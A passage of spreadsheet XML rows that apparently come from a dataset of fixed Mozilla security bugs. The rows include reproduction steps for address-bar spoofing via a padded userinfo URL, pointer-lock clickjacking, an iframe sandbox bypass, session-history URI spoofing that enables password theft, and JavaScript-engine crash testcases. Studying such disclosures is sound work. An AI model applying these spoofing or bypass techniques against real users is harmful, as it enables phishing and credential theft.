      <c r="G5572" t="n">
        <v>3</v>
      </c>
      <c r="H5572" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5572" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5572" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5572" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5572" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5572" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5572" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5572" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5572" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][only a sec issue with GGC][adv-main34+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q5572" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5572" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5572" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T5572" t="n">
        <v>1</v>
      </c>
      <c r="U5572" t="n">
        <v>0</v>
      </c>
      <c r="V5572" t="n">
        <v>28</v>
      </c>
      <c r="W5572" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision 9dc0ffca10f4 (run with --fuzzing-safe --ion-eager):
this.__defineSetter__("x", (function(stdlib) {
    "use asm";
    function f() {}
    return f;
}));
evaluate('var x = "";', { compileAndGo : true });</t>
        </is>
      </c>
      <c r="X5572" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5573">
      <c r="A5573" t="n">
        <v>1338867</v>
      </c>
      <c r="B5573" t="inlineStr">
        <is>
          <t>2017-02-11 23:14:29 -0800</t>
        </is>
      </c>
      <c r="C5573" t="inlineStr">
        <is>
          <t>Fennec allows address bar spoofing in reader view with userinfo field in front of hostname of url</t>
        </is>
      </c>
      <c r="D5573" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:13 -0700</t>
        </is>
      </c>
      <c r="E5573" t="n">
        <v>1</v>
      </c>
      <c r="F5573" t="n">
        <v>1</v>
      </c>
      <c r="G5573" t="n">
        <v>6</v>
      </c>
      <c r="H5573" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5573" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5573" t="inlineStr">
        <is>
          <t>Reader View</t>
        </is>
      </c>
      <c r="K5573" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5573" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5573" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5573" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5573" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5573" t="inlineStr">
        <is>
          <t>[adv-main53+]</t>
        </is>
      </c>
      <c r="Q5573" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5573" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5573" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5573" t="n">
        <v>1</v>
      </c>
      <c r="U5573" t="n">
        <v>0</v>
      </c>
      <c r="V5573" t="n">
        <v>36</v>
      </c>
      <c r="W5573" t="inlineStr">
        <is>
          <t>Created attachment 8836438
Screenshot of Firefox when the bug reproduced
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8
Steps to reproduce:
Connect ADB on your Android device that installed Firefox/Fennec and type following commands on the terminal.
1) adb shell
2) am start -a android.intent.action.VIEW -d about:reader?url=https://accounts.google.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20@blog.mozilla.org/security/2017/01/29/mozilla-security-bytes-episode-1-csp/
Actual results:
Firefox/Fennec launches Mozilla security blog in reader view but the address bar shows "https://accounts.google.com".
Expected results:
Userinfo field in front of hostname, i.e., https://{userinfo}@hostname, should be stripped before showing it on the address bar.</t>
        </is>
      </c>
      <c r="X5573" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5574">
      <c r="A5574" t="n">
        <v>1860065</v>
      </c>
      <c r="B5574" t="inlineStr">
        <is>
          <t>2023-10-19 07:03:33 -0700</t>
        </is>
      </c>
      <c r="C5574" t="inlineStr">
        <is>
          <t>Cursor mouse move automatically after fullscreen mode (using requestPointerLock()) lead to clickjacking</t>
        </is>
      </c>
      <c r="D5574" t="inlineStr">
        <is>
          <t>2024-09-16 00:17:20 -0700</t>
        </is>
      </c>
      <c r="E5574" t="n">
        <v>1</v>
      </c>
      <c r="F5574" t="n">
        <v>1</v>
      </c>
      <c r="G5574" t="n">
        <v>3</v>
      </c>
      <c r="H5574" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5574" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5574" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5574" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5574" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5574" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5574" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5574" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5574" t="inlineStr">
        <is>
          <t>[overlap with 1857430--eval bounties at the same time][reporter-external] [client-bounty-form] [verif?][adv-main123+][adv-esr115.8+]</t>
        </is>
      </c>
      <c r="Q5574" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5574" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5574" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T5574" t="n">
        <v>1</v>
      </c>
      <c r="U5574" t="n">
        <v>0</v>
      </c>
      <c r="V5574" t="n">
        <v>45</v>
      </c>
      <c r="W5574" t="inlineStr">
        <is>
          <t>Created attachment 9359366
bandicam 2023-10-19 20-55-22-457.mp4
i found vulnerability where Cursor mouse move automatically after fullscreen mode lead to spoof (it allow permission)
1. open new.html 
2.,click open button
3. after popup shown click once on 3-5 click button until popup window shown , then click  3-5 times
OS: Windows 10
119.0b9 (64-bit)</t>
        </is>
      </c>
      <c r="X5574" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5575">
      <c r="A5575" t="n">
        <v>1790542</v>
      </c>
      <c r="B5575" t="inlineStr">
        <is>
          <t>2022-09-12 23:56:12 -0700</t>
        </is>
      </c>
      <c r="C5575" t="inlineStr">
        <is>
          <t>allow-top-navigation-to-custom-protocols iframe sandbox bypass using sourceMappingUrls</t>
        </is>
      </c>
      <c r="D5575" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:25 -0700</t>
        </is>
      </c>
      <c r="E5575" t="n">
        <v>1</v>
      </c>
      <c r="F5575" t="n">
        <v>1</v>
      </c>
      <c r="G5575" t="n">
        <v>3</v>
      </c>
      <c r="H5575" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5575" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J5575" t="inlineStr">
        <is>
          <t>Console</t>
        </is>
      </c>
      <c r="K5575" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5575" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M5575" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5575" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5575" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5575" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main112+]</t>
        </is>
      </c>
      <c r="Q5575" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5575" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5575" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T5575" t="n">
        <v>1</v>
      </c>
      <c r="U5575" t="n">
        <v>0</v>
      </c>
      <c r="V5575" t="n">
        <v>18</v>
      </c>
      <c r="W5575" t="inlineStr">
        <is>
          <t>Created attachment 9294375
source-map.html
Using a redirect embedded into sourceMappingUrls it is possible to navigate to external protocol links in sandboxed iframes without allow-top-navigation-to-custom-protocols, (without a user gesture even!).
1. Host source-map.html and redirect.php on site 1 (attacker site), iframe.html on site 2 (victim site), as always change the URL present in the source-map.html and iframe.html files.
2. Open iframe.html in victim site, external protocol dialog will launch even with allow-top-navigation-to-custom-protocols absent. 
Very useful for malvertisers as it also bypasses the user gesture requirement for external protocols.</t>
        </is>
      </c>
      <c r="X5575" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5576">
      <c r="A5576" t="n">
        <v>1624842</v>
      </c>
      <c r="B5576" t="inlineStr">
        <is>
          <t>2020-03-25 05:54:34 -0700</t>
        </is>
      </c>
      <c r="C5576" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race [@ baseUnowned] vs. [@ updateEdge&lt;js::BaseShape&gt;]</t>
        </is>
      </c>
      <c r="D5576" t="inlineStr">
        <is>
          <t>2020-03-26 14:14:03 -0700</t>
        </is>
      </c>
      <c r="E5576" t="n">
        <v>1</v>
      </c>
      <c r="F5576" t="n">
        <v>1</v>
      </c>
      <c r="G5576" t="n">
        <v>3</v>
      </c>
      <c r="H5576" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5576" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5576" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K5576" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5576" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5576" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5576" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5576" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5576" t="inlineStr">
        <is>
          <t>[bugmon:ignore]</t>
        </is>
      </c>
      <c r="Q5576" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5576" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5576" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T5576" t="n">
        <v>1</v>
      </c>
      <c r="U5576" t="n">
        <v>0</v>
      </c>
      <c r="V5576" t="n">
        <v>5</v>
      </c>
      <c r="W5576" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision f985871b3e62+ (build with --enable-tests --enable-thread-sanitizer --disable-jemalloc --enable-optimize=-O2 --enable-fuzzing --disable-debug --enable-gczeal, run with --fuzzing-safe --cpu-count=2):
    var JSVAL_INT_MIN = -Math.pow(2, 30);
    var OMIT = {};
    var VALUES = [ -Infinity, JSVAL_INT_MIN, -0 ];
    var GETS = [ undefined ];
    var SETS = [ undefined, null, 5, OMIT ];
    var ENUMERABLES = [ true, OMIT ];
    var CONFIGURABLES = [ true ];
    var WRITABLES = [ true ];
    function mapTestDescriptors(filter) {
      var descs = [];
      function put(field, value)  {
        if (value !== OMIT)
          desc[field] = value;
      }
      VALUES.forEach(function(value)  {
        GETS.forEach(function(get)    {
          SETS.forEach(function(set)      {
            ENUMERABLES.forEach(function(enumerable)        {
              CONFIGURABLES.forEach(function(configurable)          {
                WRITABLES.forEach(function(writable)            {
                  desc = {};
                  put("value", value);
                  put("set", set);
                  put("enumerable", enumerable);
                  put("configurable", configurable);
                    descs.push(desc);
                });
              });
            });
          });
        });
      });
      return descs;
    }
    var ALL_DESCRIPTORS = mapTestDescriptors();
    gczeal(10, 2);
    newGlobal();
Backtrace:
    WARNING: ThreadSanitizer: data race (pid=28706)
      Read of size 8 at 0x7fcc64dc7670 by main thread:
        #0 baseUnowned js/src/vm/Shape.h:863:10 (js+0x9ed65f)
        #1 unowned js/src/vm/Shape.h:853:22 (js+0x9ed65f)
        #2 js::Shape::fixupShapeTreeAfterMovingGC() js/src/vm/Shape.cpp:1968:39 (js+0x9ed65f)
        #3 js::Shape::fixupAfterMovingGC() js/src/vm/Shape.cpp:1994:5 (js+0x9ed8b9)
        #4 UpdateCellPointers&lt;js::Shape&gt; js/src/gc/GC.cpp:2175:9 (js+0xe9bdc8)
        #5 UpdateArenaPointersTyped&lt;js::Shape&gt; js/src/gc/GC.cpp:2182:5 (js+0xe9bdc8)
        #6 UpdateArenaPointers js/src/gc/GC.cpp:2198:5 (js+0xe9bdc8)
        #7 UpdateArenaListSegmentPointers(js::gc::GCRuntime*, ArenaListSegment const&amp;) js/src/gc/GC.cpp:2222:5 (js+0xe9bdc8)
        #8 js::gc::GCRuntime::updateCellPointers(JS::Zone*, mozilla::EnumSet&lt;js::gc::AllocKind, unsigned long&gt;) js/src/gc/GC.cpp:2374:5 (js+0xe9a443)
        #9 updateAllCellPointers js/src/gc/GC.cpp:2435:3 (js+0xe9c359)
        #10 js::gc::GCRuntime::updateZonePointersToRelocatedCells(JS::Zone*) js/src/gc/GC.cpp:2474:3 (js+0xe9c359)
        #11 js::gc::GCRuntime::compactPhase(JS::GCReason, js::SliceBudget&amp;, js::gc::AutoGCSession&amp;) js/src/gc/GC.cpp:6130:7 (js+0xeb5cf5)
        #12 js::gc::GCRuntime::incrementalSlice(js::SliceBudget&amp;, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason, js::gc::AutoGCSession&amp;) js/src/gc/GC.cpp:6577:13 (js+0xeb7c87)
        #13 js::gc::GCRuntime::gcCycle(bool, js::SliceBudget, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason) js/src/gc/GC.cpp:6940:3 (js+0xeb98b2)
        #14 js::gc::GCRuntime::collect(bool, js::SliceBudget, mozilla::Maybe&lt;JSGCInvocationKind&gt; const&amp;, JS::GCReason) js/src/gc/GC.cpp:7123:9 (js+0xebb42a)
        #15 js::gc::GCRuntime::runDebugGC() js/src/gc/GC.cpp:7695:5 (js+0xe88290)
        #16 js::gc::GCRuntime::gcIfNeededAtAllocation(JSContext*) js/src/gc/Allocator.cpp:440:5 (js+0xe87bca)
        #17 checkAllocatorState&lt;js::CanGC&gt; js/src/gc/Allocator.cpp:402:10 (js+0xec6451)
        #18 JSObject* js::AllocateObject&lt;(js::AllowGC)1&gt;(JSContext*, js::gc::AllocKind, unsigned long, js::gc::InitialHeap, JSClass const*) js/src/gc/Allocator.cpp:61:15 (js+0xec6451)
        #19 JSFunction::create(JSContext*, js::gc::AllocKind, js::gc::InitialHeap, JS::Handle&lt;js::Shape*&gt;, JS::Handle&lt;js::ObjectGroup*&gt;) js/src/vm/JSFunction-inl.h:123:19 (js+0x934f71)
        #20 NewObject(JSContext*, JS::Handle&lt;js::ObjectGroup*&gt;, js::gc::AllocKind, js::NewObjectKind, unsigned int) js/src/vm/JSObject.cpp:797:5 (js+0x8f13ea)
        #21 js::NewObjectWithClassProtoCommon(JSContext*, JSClass const*, JS::Handle&lt;JSObject*&gt;, js::gc::AllocKind, js::NewObjectKind) js/src/vm/JSObject.cpp:934:19 (js+0x8f1956)
        #22 NewObjectWithClassProto js/src/vm/JSObject-inl.h:491:10 (js+0x8e098c)
        #23 NewObjectWithClassProto&lt;JSFunction&gt; js/src/vm/JSObject-inl.h:513:7 (js+0x8e098c)
        #24 js::NewFunctionWithProto(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), unsigned int, FunctionFlags, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSAtom*&gt;, JS::Handle&lt;JSObject*&gt;, js::gc::AllocKind, js::NewObjectKind) js/src/vm/JSFunction.cpp:2061:7 (js+0x8e098c)
        #25 JS::NewFunctionFromSpec(JSContext*, JSFunctionSpec const*, JS::Handle&lt;JS::PropertyKey&gt;) js/src/jsapi.cpp (js+0x714bda)
        #26 DefineFunctionFromSpec js/src/vm/JSObject.cpp:3076:21 (js+0x8ff990)
        #27 js::DefineFunctions(JSContext*, JS::Handle&lt;JSObject*&gt;, JSFunctionSpec const*, js::DefineAsIntrinsic) js/src/vm/JSObject.cpp:3093:10 (js+0x8ff990)
        #28 JS_DefineFunctions(JSContext*, JS::Handle&lt;JSObject*&gt;, JSFunctionSpec const*) js/src/jsapi.cpp:3389:10 (js+0x715116)
        #29 js::GlobalObject::resolveConstructor(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;, JSProtoKey, js::GlobalObject::IfClassIsDisabled) js/src/vm/GlobalObject.cpp:345:12 (js+0x81290d)
        #30 ensureConstructor js/src/vm/GlobalObject.h:179:12 (js+0x854def)
        #31 getOrCreateObjectPrototype js/src/vm/GlobalObject.h:309:12 (js+0x854def)
        #32 CreateReflectObject(JSContext*, JSProtoKey) js/src/builtin/Reflect.cpp:219:26 (js+0x854def)
        #33 js::GlobalObject::resolveConstructor(JSContext*, JS::Handle&lt;js::GlobalObject*&gt;, JSProtoKey, js::GlobalObject::IfClassIsDisabled) js/src/vm/GlobalObject.cpp:314:25 (js+0x81269e)
        #34 ensureConstructor js/src/vm/GlobalObject.h:179:12 (js+0x7015a0)
        #35 JS_ResolveStandardClass(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, bool*) js/src/jsapi.cpp:954:12 (js+0x7015a0)
        #36 global_resolve(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::PropertyKey&gt;, bool*) js/src/shell/js.cpp:9630:8 (js+0x434570)
        #37 CallResolveOp js/src/vm/NativeObject-inl.h:730:8 (js+0x966949)
        #38 LookupOwnPropertyInline&lt;js::CanGC&gt; js/src/vm/NativeObject-inl.h:812:12 (js+0x966949)
        #39 NativeGetPropertyInline&lt;js::CanGC&gt; js/src/vm/NativeObject.cpp:2430:10 (js+0x966949)
        #40 js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::PropertyKey&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/vm/NativeObject.cpp:2480:10 (js+0x966949)
        #41 GetProperty js/src/vm/ObjectOperations-inl.h:117:10 (js+0x8282bf)
        #42 GetProperty js/src/vm/ObjectOperations-inl.h:124:10 (js+0x8282bf)
        #43 GetProperty js/src/vm/ObjectOperations-inl.h:138:10 (js+0x8282bf)
        #44 JS_InitReflectParse(JSContext*, JS::Handle&lt;JSObject*&gt;) js/src/builtin/ReflectParse.cpp:3758:8 (js+0x8282bf)
        #45 NewGlobalObject(JSContext*, JS::RealmOptions&amp;, JSPrincipals*, ShellGlobalKind) js/src/shell/js.cpp:10015:10 (js+0x432661)
        #46 NewGlobal(JSContext*, unsigned int, JS::Value*) js/src/shell/js.cpp:6612:27 (js+0x442dcf)
        #47 CallJSNative js/src/vm/Interpreter.cpp:476:13 (js+0x5dadd0)
        #48 js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) js/src/vm/Interpreter.cpp:568:12 (js+0x5dadd0)
        #49 InternalCall js/src/vm/Interpreter.cpp:631:10 (js+0x5ccc9a)
        #50 CallFromStack js/src/vm/Interpreter.cpp:635:10 (js+0x5ccc9a)
        #51 Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:3027:16 (js+0x5ccc9a)
        #52 js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:448:10 (js+0x5b95f0)
        #53 js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:824:13 (js+0x5dd93d)
        #54 js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:857:10 (js+0x5ddc99)
        #55 ExecuteScript(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;, JS::Value*) js/src/vm/CompilationAndEvaluation.cpp:453:10 (js+0x7d8d90)
        #56 JS_ExecuteScript(JSContext*, JS::Handle&lt;JSScript*&gt;) js/src/vm/CompilationAndEvaluation.cpp:486:10 (js+0x7d8ee4)
        #57 RunFile(JSContext*, char const*, _IO_FILE*, CompileUtf8, bool) js/src/shell/js.cpp:913:10 (js+0x45185c)
        #58 Process(JSContext*, char const*, bool, FileKind) js/src/shell/js.cpp:1530:14 (js+0x4511f5)
        #59 ProcessArgs js/src/shell/js.cpp:10303:10 (js+0x42bf35)
        #60 Shell(JSContext*, js::cli::OptionParser*, char**) js/src/shell/js.cpp:10924:10 (js+0x42bf35)
        #61 main js/src/shell/js.cpp:11614:12 (js+0x42528a)
      Previous write of size 8 at 0x7fcc64dc7670 by thread T2:
        #0 updateEdge&lt;js::BaseShape&gt; js/src/gc/GC.cpp:2092:13 (js+0xe98b1e)
        #1 js::gc::MovingTracer::onBaseShapeEdge(js::BaseShape**) js/src/gc/GC.cpp:2107:10 (js+0xe98b1e)
        #2 dispatchToOnEdge objdir-ff-fuzzing-tsan/dist/include/js/TracingAPI.h:271:12 (js+0xf30f7d)
        #3 bool DoCallback&lt;js::BaseShape&gt;(JS::CallbackTracer*, js::BaseShape**, char const*) js/src/gc/Tracer.cpp:45:15 (js+0xf30f7d)
        #4 bool js::gc::TraceEdgeInternal&lt;js::BaseShape*&gt;(JSTracer*, js::BaseShape**, char const*) js/src/gc/Marking.cpp:718:10 (js+0xf13f92)
        #5 TraceEdge&lt;js::UnownedBaseShape *&gt; js/src/gc/Tracer.h:125:3 (js+0x9eba27)
        #6 traceChildrenSkipShapeCache js/src/vm/Shape.cpp:1650:5 (js+0x9eba27)
        #7 js::BaseShape::traceChildren(JSTracer*) js/src/vm/Shape.cpp:1644:3 (js+0x9eba27)
        #8 UpdateCellPointers&lt;js::BaseShape&gt; js/src/gc/GC.cpp:2176:9 (js+0xe9b759)
        #9 UpdateArenaPointersTyped&lt;js::BaseShape&gt; js/src/gc/GC.cpp:2182:5 (js+0xe9b759)
        #10 UpdateArenaPointers js/src/gc/GC.cpp:2198:5 (js+0xe9b759)
        #11 UpdateArenaListSegmentPointers(js::gc::GCRuntime*, ArenaListSegment const&amp;) js/src/gc/GC.cpp:2222:5 (js+0xe9b759)
        #12 js::gc::ParallelWorker&lt;ArenaListSegment, ArenasToUpdate&gt;::run() js/src/gc/ParallelWork.h:55:22 (js+0xee8fef)
        #13 js::GCParallelTask::runTask() js/src/gc/GCParallelTask.cpp:146:3 (js+0xec5c43)
        #14 js::GCParallelTask::runFromHelperThread(js::AutoLockHelperThreadState&amp;) js/src/gc/GCParallelTask.cpp:131:5 (js+0xec5ae0)
        #15 js::HelperThread::handleGCParallelWorkload(js::AutoLockHelperThreadState&amp;) js/src/vm/HelperThreads.cpp:1712:21 (js+0x88a8ee)
        #16 js::HelperThread::threadLoop() js/src/vm/HelperThreads.cpp:2522:5 (js+0x88c978)
        #17 js::HelperThread::ThreadMain(void*) js/src/vm/HelperThreads.cpp:2044:11 (js+0x888151)
        #18 callMain&lt;0&gt; js/src/threading/Thread.h:218:5 (js+0x8d6734)
        #19 js::detail::ThreadTrampoline&lt;void (&amp;)(void*), js::HelperThread*&gt;::Start(void*) js/src/threading/Thread.h:207:11 (js+0x8d6734)
      Thread T2 'JS Helper' (tid=28709, running) created by main thread at:
        #0 pthread_create /srv/repos/llvm-project/compiler-rt/lib/tsan/rtl/tsan_interceptors_posix.cpp:962 (js+0x377945)
        #1 js::Thread::create(void* (*)(void*), void*) js/src/threading/posix/PosixThread.cpp:52:7 (js+0x77b93d)
        #2 bool js::Thread::init&lt;void (&amp;)(void*), js::HelperThread*&gt;(void (&amp;)(void*), js::HelperThread*&amp;&amp;) js/src/threading/Thread.h:91:12 (js+0x8b2e56)
        #3 js::GlobalHelperThreadState::ensureInitialized() js/src/vm/HelperThreads.cpp:1158:27 (js+0x882698)
        #4 js::EnsureHelperThreadsInitialized() js/src/vm/HelperThreads.cpp:94:30 (js+0x882256)
        #5 JSRuntime::init(JSContext*, unsigned int) js/src/vm/Runtime.cpp:200:32 (js+0x9b2fd5)
        #6 js::NewContext(unsigned int, JSRuntime*) js/src/vm/JSContext.cpp:170:17 (js+0x8d94a7)
        #7 JS_NewContext(unsigned int, JSRuntime*) js/src/jsapi.cpp:391:10 (js+0x6fdc54)
        #8 main js/src/shell/js.cpp:11479:25 (js+0x424a05)
    SUMMARY: ThreadSanitizer: data race js/src/vm/Shape.h:863:10 in baseUnowned
This is likely bug 1622969 but with a testcase and full stack. The second stack was suppressed by these suppressions:
```
         // Bug 1600895
         "race:js::gc::MovingTracer::onBaseShapeEdge\n"
         "race:js::gc::MovingTracer::onScopeEdge\n"
         "race:js::gc::MovingTracer::onShapeEdge\n"
```
Removing those made this bug reproducible 100% and provided the full stack.</t>
        </is>
      </c>
      <c r="X5576" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5577">
      <c r="A5577" t="n">
        <v>848253</v>
      </c>
      <c r="B5577" t="inlineStr">
        <is>
          <t>2013-03-06 00:16:20 -0800</t>
        </is>
      </c>
      <c r="C5577" t="inlineStr">
        <is>
          <t>It's possible to set a document's URI to a different document's URI</t>
        </is>
      </c>
      <c r="D5577" t="inlineStr">
        <is>
          <t>2024-05-30 08:01:01 -0700</t>
        </is>
      </c>
      <c r="E5577" t="n">
        <v>1</v>
      </c>
      <c r="F5577" t="n">
        <v>1</v>
      </c>
      <c r="G5577" t="n">
        <v>3</v>
      </c>
      <c r="H5577" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5577" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5577" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5577" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5577" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5577" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5577" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5577" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5577" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1708+]</t>
        </is>
      </c>
      <c r="Q5577" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5577" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5577" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T5577" t="n">
        <v>1</v>
      </c>
      <c r="U5577" t="n">
        <v>0</v>
      </c>
      <c r="V5577" t="n">
        <v>37</v>
      </c>
      <c r="W5577" t="inlineStr">
        <is>
          <t>When a replace load happens in a subframe, nsDocShell::AddToSessionHistory reuses an existing SHEntry without creating a new BFCache entry. This can cause nsDocShell::InternalLoad to do a short-circuited load between different documents. By using this bug, it's possible to set a document's URI to a different document's URI.
* An attacker can create a fake login page whose URI is a real login page's URI. And, if a password for the real login page was already saved in the Password Manager, an attacker can steal the password without user interaction.
* An attacker can inject scripts into a page that uses external scripts with relative URLs.</t>
        </is>
      </c>
      <c r="X5577" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5578">
      <c r="A5578" t="n">
        <v>103979</v>
      </c>
      <c r="B5578" t="inlineStr">
        <is>
          <t>2001-10-09 18:46:37 -0700</t>
        </is>
      </c>
      <c r="C5578" t="inlineStr">
        <is>
          <t>Crash if autoconfig proxies prefs enabled by the default</t>
        </is>
      </c>
      <c r="D5578" t="inlineStr">
        <is>
          <t>2001-10-23 13:47:59 -0700</t>
        </is>
      </c>
      <c r="E5578" t="n">
        <v>1</v>
      </c>
      <c r="F5578" t="n">
        <v>1</v>
      </c>
      <c r="G5578" t="n">
        <v>3</v>
      </c>
      <c r="H5578" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5578" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5578" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5578" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5578" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5578" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5578" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5578" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q5578" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
